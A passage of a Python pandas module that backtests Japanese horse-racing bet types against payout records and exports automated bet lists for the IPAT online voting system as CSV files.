0\")[\"複勝\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n fuku_return_min = round(fuku_return_qua[0])\n fuku_return_25 = round(fuku_return_qua[0.25])\n fuku_return_med = round(fuku_return_qua[0.50])\n fuku_return_75 = round(fuku_return_qua[0.75])\n fuku_return_max = round(fuku_return_qua[1])\n fuku_return_all = round(target_df[\"複勝\"].sum())\n fuku_return_avg = round(target_df[\"複勝\"].mean(),1)\n res_sr = pd.Series({\"総数\": uma1_count, \"レース数\": race_count,\n \"単勝的中数\": tansho_hit, \"単勝的中率\": tansho_hit_rate, \"単勝的中R率\": race_tansho_hit_rate, \"単勝払戻総額\": tan_return_all, \"単勝回収率\": tan_return_avg,\n \"複勝的中数\": fukusho_hit, \"複勝的中率\": fukusho_hit_rate, \"複勝的中R率\": race_fukusho_hit_rate, \"複勝払戻総額\": fuku_return_all, \"複勝回収率\": fuku_return_avg,\n \"単勝最低配当\": tan_return_min, \"単勝配当25%\": tan_return_25, \"単勝配当中央値\": tan_return_med, \"単勝配当75%\": tan_return_75, \"単勝最高配当\": tan_return_max,\n \"複勝最低配当\": fuku_return_min, \"複勝配当25%\": fuku_return_25, \"複勝配当中央値\": fuku_return_med, \"複勝配当75%\": fuku_return_75, \"複勝最高配当\": fuku_return_max})\n return res_sr\n\n def get_sim_umaren_df(self, uma1_df, uma2_df):\n target_df = self.get_umaren_target_df(uma1_df, uma2_df)\n result_df = self.haraimodoshi_dict[\"umaren_df\"]\n target_df = pd.merge(target_df, result_df, on=\"RACE_KEY\")\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_1\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_2\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] else 0, axis=1)\n return target_df\n\n def get_umaren_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, 
on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(columns={\"RACE_KEY_1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(columns={\"RACE_KEY_2\":\"RACE_KEY\"})\n self.ld.set_odds_df(\"馬連\")\n odds_df = self.ld.odds_df\n base_uma1_df = pd.merge(uma1_df[[\"RACE_KEY\", \"UMABAN\"]], odds_df, on=[\"RACE_KEY\", \"UMABAN\"]).set_index([\"RACE_KEY\", \"UMABAN\"])\n umaren_uma1_df = base_uma1_df[['馬連オッズ01', '馬連オッズ02', '馬連オッズ03', '馬連オッズ04', '馬連オッズ05', '馬連オッズ06', '馬連オッズ07', '馬連オッズ08', '馬連オッズ09',\n '馬連オッズ10', '馬連オッズ11', '馬連オッズ12', '馬連オッズ13', '馬連オッズ14', '馬連オッズ15', '馬連オッズ16', '馬連オッズ17', '馬連オッズ18']].copy()\n umaren_uma1_df.columns = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\"]\n umaren_uma1_df = umaren_uma1_df.stack().reset_index()\n umaren_uma1_df.columns = [\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"オッズ\"]\n #umaren_uma1_df = umaren_uma1_df.astype({\"RACE_KEY\": 'str', \"UMABAN_1\": 'str', \"UMABAN_2\": 'str'})\n target_df = pd.merge(umaren_uma1_df, self.race_df, on=\"RACE_KEY\")\n target_df = pd.merge(target_df, add_uma1_df, on=[\"RACE_KEY\", \"UMABAN_1\"])\n target_df = pd.merge(target_df, add_uma2_df, on=[\"RACE_KEY\", \"UMABAN_2\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n return target_df\n\n def calc_umaren_result(self, target_df):\n target_df = target_df.query(\"UMABAN_1 != UMABAN_2\").copy()\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(),1)\n res_sr = pd.Series({\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n def get_sim_wide_df(self, uma1_df, uma2_df):\n target_df = self.get_wide_target_df(uma1_df, uma2_df)\n result_df = self.haraimodoshi_dict[\"wide_df\"]\n result_df.loc[:, \"UMABAN_1\"] = result_df[\"UMABAN\"].apply(lambda x: x[0])\n result_df.loc[:, \"UMABAN_2\"] = result_df[\"UMABAN\"].apply(lambda x: x[1])\n 
target_df = pd.merge(target_df, result_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"], how='left')\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN\"] == x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN\"] == x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] else 0, axis=1)\n return target_df.fillna(0)\n\n def get_wide_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(\n columns={\"RACE_KEY1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(\n columns={\"RACE_KEY2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN1 != UMABAN2\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n self.ld.set_odds_df(\"ワイド\")\n odds_df = self.ld.odds_df\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = target_df.rename(columns={\"ワイドオッズ\": \"オッズ\"})\n return target_df\n\n def calc_wide_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True\")[\n [\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(), 1)\n res_sr = pd.Series(\n {\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n def get_sim_umatan_df(self, uma1_df, uma2_df):\n target_df = self.get_umatan_target_df(uma1_df, uma2_df)\n result_df = self.haraimodoshi_dict[\"umatan_df\"]\n target_df = pd.merge(target_df, result_df, 
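A note on the self-comparison in get_sim_wide_df above: after the how='left' merge, unmatched rows carry NaN, and x['UMABAN'] == x['UMABAN'] is False exactly for NaN, which is what marks misses as 0. pd.notna states that intent directly (illustration only, not a patch):

import pandas as pd

hit = pd.Series([1.0, float('nan')])
print((hit == hit).tolist())   # [True, False] because NaN != NaN
print(pd.notna(hit).tolist())  # [True, False], the same check made explicit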
on=\"RACE_KEY\")\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_1\"] == x[\"UMABAN\"][0] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_2\"] == x[\"UMABAN\"][1] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] else 0, axis=1)\n return target_df\n\n def get_umatan_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(\n columns={\"RACE_KEY_1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(\n columns={\"RACE_KEY_2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN_1 != UMABAN_2\")\n self.ld.set_odds_df(\"馬単\")\n odds_df = self.ld.odds_df\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.rename(columns={\"馬単オッズ\": \"オッズ\"})\n return target_df\n\n def calc_umatan_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True\")[\n [\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(), 1)\n res_sr = pd.Series(\n {\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n def get_sim_sanrenpuku_df(self, uma1_df, uma2_df, uma3_df):\n target_df = self.get_sanrenpuku_target_df(uma1_df, uma2_df, uma3_df)\n result_df = self.haraimodoshi_dict[\"sanrenpuku_df\"]\n target_df = pd.merge(target_df, result_df, on=\"RACE_KEY\")\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN1\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN2\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬3結果\"] = target_df.apply(lambda x: True if x[\"UMABAN3\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"結果\"] = 
target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] and x[\"馬3結果\"] else 0, axis=1)\n return target_df\n\n def get_sanrenpuku_target_df(self, uma1_df, uma2_df, uma3_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(columns={\"RACE_KEY1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(columns={\"RACE_KEY2\":\"RACE_KEY\"})\n add_uma3_df = pd.merge(uma3_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"3\").rename(columns={\"RACE_KEY3\":\"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = pd.merge(base_df, add_uma3_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"(UMABAN1 != UMABAN2) and (UMABAN2 != UMABAN3) and (UMABAN3) != (UMABAN1)\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"], x[\"UMABAN3\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n base_df.loc[:, \"UMABAN_3\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[2])\n self.ld.set_odds_df(\"三連複\")\n odds_df = self.ld.odds_df\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = target_df.rename(columns={\"3連複オッズ\": \"オッズ\"})\n return target_df\n\n def calc_sanrenpuku_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n uma3_count = len(target_df[[\"RACE_KEY\", \"UMABAN3\"]].drop_duplicates().index)\n uma3_hit = len(target_df.query(\"馬3結果 == True\")[[\"RACE_KEY\", \"UMABAN3\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True and 馬3結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n uma3_hit_rate = round(uma3_hit / uma3_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(),1)\n res_sr = pd.Series({\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"馬3総数\": uma3_count, \"馬3的中数\": uma3_hit,\n \"馬3的中率\": uma3_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": 
return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n\n\nclass AutoVote(Simlation):\n def _set_base_df(self, term_start_date, term_end_date):\n self.auto_bet_path = self.target_path + 'AUTO_BET/'\n self.ld.set_race_df()\n self.ld.set_race_file_df()\n self.ld.set_target_mark_df()\n self.ld.set_target_race_mark()\n base_term_df = self.ld.race_df.query(f\"NENGAPPI >= '{term_start_date}' and NENGAPPI <= '{term_end_date}'\")[[\"RACE_KEY\"]].copy()\n self.res_raceuma_df = self.ld.ext.get_raceuma_before_table_base()[[\"RACE_KEY\", \"UMABAN\"]].copy()\n self.race_df = self.ld.race_df[[\"RACE_KEY\", \"場コード\", \"距離\", \"芝ダ障害コード\", \"種別\", \"条件\", \"天候コード\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"COURSE_KEY\", \"target_date\", \"距離グループ\", \"非根幹\"]].copy()\n self.race_df = pd.merge(self.race_df, self.ld.race_mark_df, on =\"RACE_KEY\")\n self.race_df = pd.merge(self.race_df, base_term_df, on=\"RACE_KEY\")\n self.target_mark_df = self.ld.target_mark_df.copy()\n self.target_mark_df = pd.merge(self.target_mark_df, base_term_df, on=\"RACE_KEY\")\n\n def export_bet_csv(self):\n target_df = self.target_mark_df.copy()\n tansho_ipat_bet_df, tansho_target_bet_df = self.get_tansho_bet_df(target_df)\n fukusho_ipat_bet_df, fukusho_target_bet_df = self.get_fukusho_bet_df(target_df)\n umaren_ipat_bet_df, umaren_target_bet_df = self.get_umaren_bet_df(target_df, target_df)\n umatan_ipat_bet_df, umatan_target_bet_df = self.get_umatan_bet_df(target_df, target_df)\n wide_ipat_bet_df, wide_target_bet_df = self.get_wide_bet_df(target_df, target_df)\n sanrenpuku_uma1_df = target_df.query(\"印 == '◎ '\").copy()\n sanrenpuku_uma2_df = target_df.query(\"印 in ['× ', '△ ', '▲ ', '○ ']\").copy()\n sanrenpuku_uma3_df = target_df.query(\"印 != '◎ '\").copy()\n sanrenpuku_ipat_bet_df, sanrenpuku_target_bet_df = self.get_sanrenpuku_bet_df(sanrenpuku_uma1_df, sanrenpuku_uma2_df, sanrenpuku_uma3_df)\n ipat_bet_df = pd.concat([tansho_ipat_bet_df, fukusho_ipat_bet_df, umaren_ipat_bet_df, umatan_ipat_bet_df, wide_ipat_bet_df, sanrenpuku_ipat_bet_df])\n ipat_bet_df.to_csv(self.auto_bet_path + \"ipat_bet.csv\", index=False, header=False)\n target_bet_df = pd.concat([tansho_target_bet_df, fukusho_target_bet_df, umaren_target_bet_df, umatan_target_bet_df, wide_target_bet_df, sanrenpuku_target_bet_df])\n target_bet_df = target_bet_df.sort_values([\"RACE_ID\", \"エリア\", \"券種\", \"購入金額\", \"目1\", \"目2\", \"目3\"])\n target_bet_df.to_csv(self.auto_bet_path + \"target_bet.csv\", index=False, header=False)\n\n def get_tansho_bet_df(self, target_df):\n tansho_base_df = self.get_sim_tanpuku_df(target_df)\n bet_df = tansho_base_df.query(\"印 in ['△ ', '▲ ', '○ ', '◎ '] and 勝 in ['☆ ','▲ ', '○ ', '◎ '] and 単勝オッズ >= 10\").copy()\n bet_df.loc[:, \"コード\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"TANSYO\"\n bet_df.loc[:, \"券種\"] = '0'\n bet_df.loc[:, \"オッズ\"] = bet_df[\"単勝オッズ\"]\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_fukusho_bet_df(self, target_df):\n tansho_base_df = self.get_sim_tanpuku_df(target_df)\n bet_df = tansho_base_df.query(\"印 in ['△ ', '▲ ', '○ ', '◎ '] and 軸 in ['☆ ', '○ ', '◎ '] and 複勝オッズ >= 5 and レース印 != '000000'\").copy()\n bet_df.loc[:, \"コード\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, 
\"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"FUKUSHO\"\n bet_df.loc[:, \"券種\"] = '1'\n bet_df.loc[:, \"オッズ\"] = bet_df[\"複勝オッズ\"]\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_umaren_bet_df(self, uma1_df, uma2_df):\n umaren_base_df = self.get_umaren_target_df(uma1_df, uma2_df)\n bet_df = umaren_base_df.query(\n \"印_1 == '◎ ' and 印_2 in ['△ ', '▲ ', '○ '] and 軸_1 != '◎ ' and 軸_2 not in ['◎ ', '▲ '] and オッズ >= 50\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"UMAREN\"\n bet_df.loc[:, \"券種\"] = '3'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_umatan_bet_df(self, uma1_df, uma2_df):\n umatan_base_df = self.get_umatan_target_df(uma1_df, uma2_df)\n bet_df = umatan_base_df.query(\n \"勝_1 == '☆ ' and 印_1 in ['▲ ', '○ ', '◎ '] and 軸_2 in ['☆ ','▲ ', '○ ', '◎ '] and オッズ >= 50\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"UMATAN\"\n bet_df.loc[:, \"券種\"] = '5'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_wide_bet_df(self, uma1_df, uma2_df):\n wide_base_df = self.get_wide_target_df(uma1_df, uma2_df)\n bet_df = wide_base_df.query(\n \"印1 in ['▲ ', '○ ', '◎ '] and (軸1 != ' ' or 勝1 != ' ') and 軸2 in ['☆ ', '◎ '] and オッズ >= 20 and オッズ <= 100\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"WIDE\"\n bet_df.loc[:, \"券種\"] = '4'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_sanrenpuku_bet_df(self, uma1_df, uma2_df, uma3_df):\n sanrenpuku_base_df = self.get_sanrenpuku_target_df(uma1_df, uma2_df, uma3_df)\n bet_df = sanrenpuku_base_df.query(\n \"軸1 in ['☆ ', '▲ ', '○ ', '◎ '] and 印2 in ['△ ', '▲ ', '○ '] and 軸3 in ['▲ ', '○ ', '◎ '] and オッズ >= 50 and オッズ <= 150\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"] + \"-\" + x[\"UMABAN_3\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =bet_df[\"UMABAN_3\"]\n bet_df.loc[:, \"馬券式\"] = \"SANRENPUKU\"\n bet_df.loc[:, \"券種\"] = '6'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def _get_ipatgo_bet_df(self, bet_df):\n bet_df[\"年月日\"] = bet_df[\"target_date\"]\n bet_df.loc[:, \"競馬場\"] = bet_df[\"RACE_KEY\"].apply(lambda x: self._convert_keibajo(x[0:2]))\n bet_df.loc[:, \"レース番号\"] = bet_df[\"RACE_KEY\"].str[6:8].astype(int)\n bet_df.loc[:, \"投票方式\"] = \"NORMAL\"\n bet_df.loc[:, \"マルチ\"] = \"MULTI\"\n bet_df.loc[:, \"金額\"] = 100\n bet_df = bet_df[[\"年月日\", \"競馬場\", \"レース番号\", \"馬券式\", \"投票方式\", \"マルチ\", 
\"コード\", \"金額\"]].copy()\n return bet_df\n\n def _get_target_bet_df(self, bet_df):\n bet_df = pd.merge(bet_df, self.ld.race_file_df, on=\"RACE_KEY\")\n bet_df.loc[:, \"変換フラグ\"] = 0\n bet_df.loc[:, \"購入金額\"] = 100\n bet_df.loc[:, \"的中時の配当\"] = 0\n bet_df.loc[:, \"エリア\"] = \"H\"\n bet_df.loc[:, \"マーク\"] = \"\"\n bet_df = bet_df[[\"RACE_ID\", \"変換フラグ\", \"券種\", \"目1\", \"目2\", \"目3\", \"購入金額\", \"オッズ\", \"的中時の配当\", \"エリア\", \"マーク\"]].copy()\n return bet_df\n\n def _convert_keibajo(self, str):\n if str == '01': return \"SAPPORO\"\n if str == '02': return \"HAKODATE\"\n if str == '03': return \"FUKUSHIMA\"\n if str == '04': return \"NIIGATA\"\n if str == '05': return \"TOKYO\"\n if str == '06': return \"NAKAYAMA\"\n if str == '07': return \"CHUKYO\"\n if str == '08': return \"KYOTO\"\n if str == '09': return \"HANSHIN\"\n if str == '10': return \"KOKURA\"\n\n def export_pbi_data(self):\n race_df = self.ld.race_df.copy()\n race_df.loc[:, \"場名\"] = 